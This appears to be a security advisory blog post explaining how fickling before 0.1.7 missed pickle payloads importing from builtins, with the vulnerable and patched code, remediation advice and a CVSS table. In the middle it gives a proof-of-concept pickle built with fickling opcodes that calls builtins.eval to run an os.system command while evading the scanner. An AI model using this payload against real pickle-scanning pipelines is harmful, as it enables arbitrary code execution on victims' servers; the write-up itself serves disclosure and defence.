Feb 23, 2026 · 6 min read
Fickling < 0.1.7 fails to detect malicious pickle payloads that use the `builtins` namespace. To keep decompiled code 'clean', the tool skipped generating AST nodes for builtin imports. This allows attackers to bypass static analysis and achieve RCE by explicitly importing dangerous functions like `builtins.eval`.
Python's `pickle` module is notoriously dangerous—essentially a Remote Code Execution (RCE) engine masquerading as a serialization format. Tools like `fickling` were built to tame this beast by decompiling the pickle bytecode into a Python Abstract Syntax Tree (AST) and scanning it for malicious patterns. However, in a classic case of 'developer convenience over security,' `fickling` contained a logic flaw designed to make the decompiled output look cleaner. By intentionally suppressing AST nodes for `builtins`, the tool created a massive blind spot. Attackers could simply invoke `builtins.eval` or `builtins.exec` directly, and the security scanner—relying on those suppressed nodes—would happily wave the malicious payload through as safe.
If you've spent any time in the Python security trenches, you know the rule: Never unpickle untrusted data. It is not a suggestion; it is a commandment. Python's pickle serialization format is a stack-based virtual machine that allows the reconstruction of arbitrary objects. In the wrong hands, a pickle file isn't data; it's a script that executes inside your application's context.
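To ground the "it's a script, not data" claim, here is a harmless sketch of the mechanism: any object's `__reduce__` method can hand the unpickler an arbitrary callable to invoke. We use `len` as a benign stand-in for `os.system`:

```python
import pickle

class Payload:
    """Any object can smuggle a callable into the pickle stream."""
    def __reduce__(self):
        # On unpickling, the pickle VM CALLS len("pwned"). Imagine
        # os.system here instead -- len is a harmless stand-in.
        return (len, ("pwned",))

data = pickle.dumps(Payload())
result = pickle.loads(data)  # executes len("pwned") during load
print(result)  # -> 5
```

The call happens as a side effect of `pickle.loads` itself, before your application ever touches the "data".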
Enter `fickling`. Developed by the sharp minds at Trail of Bits, `fickling` is a decompiler and static analyzer for pickle data. Its goal is noble: perform a 'pre-flight check' on untrusted pickles by converting the obscure stack opcodes into a readable Python AST (Abstract Syntax Tree), then statically analyzing that AST for dangerous calls like `os.system` or `subprocess.Popen`.
It’s a brilliant approach. Instead of trying to sandbox the execution, you analyze the intent. But CVE-2026-22612 reveals a fatal flaw in this translation layer. It turns out that in the pursuit of 'pretty' decompiled code, the tool decided to ignore the most dangerous namespace in the entire language: builtins.
The vulnerability resides in the engine that translates pickle opcodes into Python AST. When fickling encounters a GLOBAL opcode (which imports a module and an attribute), it generates an ast.ImportFrom node. This node is critical because the security scanner (analysis.py) scans the AST specifically looking for these import nodes to track where functions come from.
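As a rough sketch of how such import tracking works (this is illustrative, not fickling's actual `analysis.py`), a scanner walks the AST and matches `ast.ImportFrom` nodes against a blacklist of dangerous `(module, name)` pairs:

```python
import ast

# Illustrative blacklist -- not fickling's real list.
UNSAFE = {("builtins", "eval"), ("os", "system"), ("subprocess", "Popen")}

def scan(source: str) -> list:
    """Flag imports of known-dangerous names in decompiled pickle code."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.ImportFrom):
            for alias in node.names:
                if (node.module, alias.name) in UNSAFE:
                    findings.append(f"{node.module}.{alias.name}")
    return findings

print(scan("from builtins import eval\n_var0 = eval('1+1')"))
# -> ['builtins.eval']
```

The crucial dependency: if the decompiler never emits the `ImportFrom` node, this style of scanner has nothing to match, no matter how dangerous the call site is.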
Here is where the logic went off the rails. The developers presumably thought, "Hey, if the pickle imports something from builtins (like str, int, or dict), we shouldn't clutter the decompiled output with from builtins import str. That's redundant in Python code."
So, they added a filter. If the module being imported was builtins, __builtin__, or __builtins__, fickling would skip generating the ast.ImportFrom node. It was a purely cosmetic decision—a "clean code" optimization.
Unfortunately, this optimization applied to everything in builtins, not just the safe stuff. It applied to builtins.eval, builtins.exec, builtins.compile, and builtins.getattr. By suppressing the import node, the AST effectively forgot where these functions came from. The security scanner would see a call to eval(...) in the code, but without the import trace linking it to the dangerous builtins module, it failed to flag it as malicious.
Let's look at the vulnerable code in `fickling/pickle.py`. This is the opcode handler for `GLOBAL` (opcode `c`) and `STACK_GLOBAL` (opcode `\x93`).
The Vulnerable Logic:
```python
def run(self, interpreter: Interpreter):
    module, attr = self.module, self.attr
    # The fatal mistake: explicit blindness to builtins
    if module in ("__builtin__", "__builtins__", "builtins"):
        pass  # <--- "Nothing to see here, move along."
    else:
        alias = ast.alias(attr)
        interpreter.module_body.append(
            ast.ImportFrom(module=module, names=[alias], level=0)
        )
    interpreter.stack.append(ast.Name(attr, ast.Load()))
```

Because of that `if` block, an attacker importing `builtins.eval` results in... nothing in the module body. The interpreter stack gets the name `eval`, but the static analyzer has lost the context.
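To see the blind spot concretely, compare the two shapes of decompiled output using the standard `ast` module (the source strings below stand in for fickling's decompiled code):

```python
import ast

# What the vulnerable decompiler effectively emitted: a bare call, no import.
invisible = ast.parse('_var0 = eval("__import__(\'os\').system(\'id\')")')

# What the patched decompiler emits: the import is part of the AST.
visible = ast.parse('from builtins import eval\n_var0 = eval("...")')

def has_import(tree) -> bool:
    return any(isinstance(n, ast.ImportFrom) for n in ast.walk(tree))

print(has_import(invisible), has_import(visible))  # -> False True
```

An import-based scanner sees the first tree as containing nothing to check.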
The Fix (Commit 9f309ab834797f280cb5143a2f6f987579fa7cdf):
The patch is delightfully simple: delete the special treatment. Treat builtins like any other module. If the malicious pickle imports it, the AST should reflect it.
```python
def run(self, interpreter: Interpreter):
    module, attr = self.module, self.attr
    # No more hiding.
    alias = ast.alias(attr)
    interpreter.module_body.append(
        ast.ImportFrom(module=module, names=[alias], level=0)
    )
    interpreter.stack.append(ast.Name(attr, ast.Load()))
```

To exploit this, we don't need a complex memory corruption chain. We just need to speak the language of the Pickle Machine. We will construct a pickle stream that explicitly pulls `eval` from `builtins`.
Here is how we construct the payload using fickling's own opcode builders (ironic, isn't it?):
```python
from fickling.pickle import Pickled, op

# The payload sequence
payload = [
    # Opcode 'c': GLOBAL. Import 'eval' from 'builtins'.
    # Vulnerable fickling sees this and generates NO import node.
    op.Global("builtins eval"),
    # Push the argument for eval, wrapped in a one-element tuple
    op.String("__import__('os').system('id')"),
    op.TupleOne(),
    # Opcode 'R': REDUCE. Call the function (eval) with the tuple of arguments.
    # Fickling sees: eval("__import__('os').system('id')")
    # But since it missed the import, it thinks 'eval' might be a safe local function.
    op.Reduce(),
    # Opcode '.': STOP. Terminate the stream; the top of the stack is the result.
    op.Stop(),
]
pickled_data = Pickled(payload).dumps()
```

When fickling < 0.1.7 scans this, it generates an AST that looks roughly like this:
```python
_var0 = eval("__import__('os').system('id')")
```

Wait, you might ask: "Shouldn't it catch `eval` anyway?" Not necessarily. The analyzer checks for unsafe imports. If the import is invisible, the check fails open: the logic assumes that if a function isn't explicitly imported from a blacklisted module, it's user-defined and safe.
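A hypothetical sketch of such fail-open logic (illustrative only, not fickling's actual analyzer) makes the failure mode obvious:

```python
# Illustrative blacklist and import map -- names here are assumptions.
BLACKLIST = {"builtins": {"eval", "exec", "compile"}, "os": {"system"}}

def is_flagged(func_name: str, import_map: dict) -> bool:
    """import_map maps a name to the module it was imported from,
    as recovered from ast.ImportFrom nodes in the decompiled code."""
    module = import_map.get(func_name)
    if module is None:
        return False  # unknown origin: assumed local -- the check fails open
    return func_name in BLACKLIST.get(module, set())

print(is_flagged("eval", {}))                    # -> False: the bypass
print(is_flagged("eval", {"eval": "builtins"}))  # -> True: caught once visible
```

With the import node suppressed, `import_map` is empty and every `eval` call takes the fail-open branch.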
The impact here is straightforward and severe: Detection Bypass. Organizations deploying fickling likely use it as a gatekeeper for Machine Learning models (which are often pickled) or other serialized data streams. They believe they have a safety net.
This vulnerability renders that net useless against a knowledgeable attacker. If you are relying on fickling to sanitize user uploads, you are currently vulnerable to Arbitrary Code Execution. The attacker can execute any Python code on your server with the privileges of the process running the unpickler.
This is particularly dangerous because it doesn't rely on a bug in Python itself; it exploits the security tool's assumption of what constitutes "relevant" code. It's a meta-exploit.
The remediation is simple: upgrade to fickling 0.1.7 or later immediately.
This version removes the logic that suppresses builtins imports. Now, when fickling encounters builtins.eval, it generates from builtins import eval in the AST. The security scanner, seeing this explicit import from a dangerous namespace, will immediately flag the file as unsafe.
Long-term Strategy:
While fickling is an excellent tool for analysis, it should not be the only line of defense. Pickling is inherently unsafe by design. If possible, move to safer serialization formats like JSON or Protocol Buffers. If you must use pickles (e.g., for PyTorch models), run the unpickling process in a tightly sandboxed environment with no network access and ephemeral filesystems.
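If you truly cannot avoid pickle, the standard library documents a defense-in-depth pattern: override `Unpickler.find_class` to allow-list the globals that may be resolved. A minimal sketch (the allow-list contents are an assumption; tailor them to your data):

```python
import io
import pickle

class SafeUnpickler(pickle.Unpickler):
    """Allow-list unpickler: only named (module, name) pairs may be imported."""
    ALLOWED = {("collections", "OrderedDict")}  # assumption: extend as needed

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        # Any GLOBAL/STACK_GLOBAL outside the allow-list -- including
        # 'builtins eval' -- is rejected before it can be called.
        raise pickle.UnpicklingError(f"blocked import: {module}.{name}")

def safe_loads(data: bytes):
    return SafeUnpickler(io.BytesIO(data)).load()

print(safe_loads(pickle.dumps({"a": 1})))  # plain data still round-trips
```

Unlike static analysis, this enforces the policy at load time, so an invisible import node cannot help the attacker.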
CVSS vector: `CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`

| Product | Affected Versions | Fixed Version |
|---|---|---|
| fickling (Trail of Bits) | < 0.1.7 | 0.1.7 |
| Attribute | Detail |
|---|---|
| Vulnerability Type | Security Feature Bypass |
| Attack Vector | Local / Network (Context Dependent) |
| CVSS v3.1 | 7.8 (High) |
| Impact | Remote Code Execution (RCE) |
| Exploit Status | PoC Available |
| Affected Component | Pickle-to-AST Translation Layer |
Improper Input Validation leads to security feature bypass.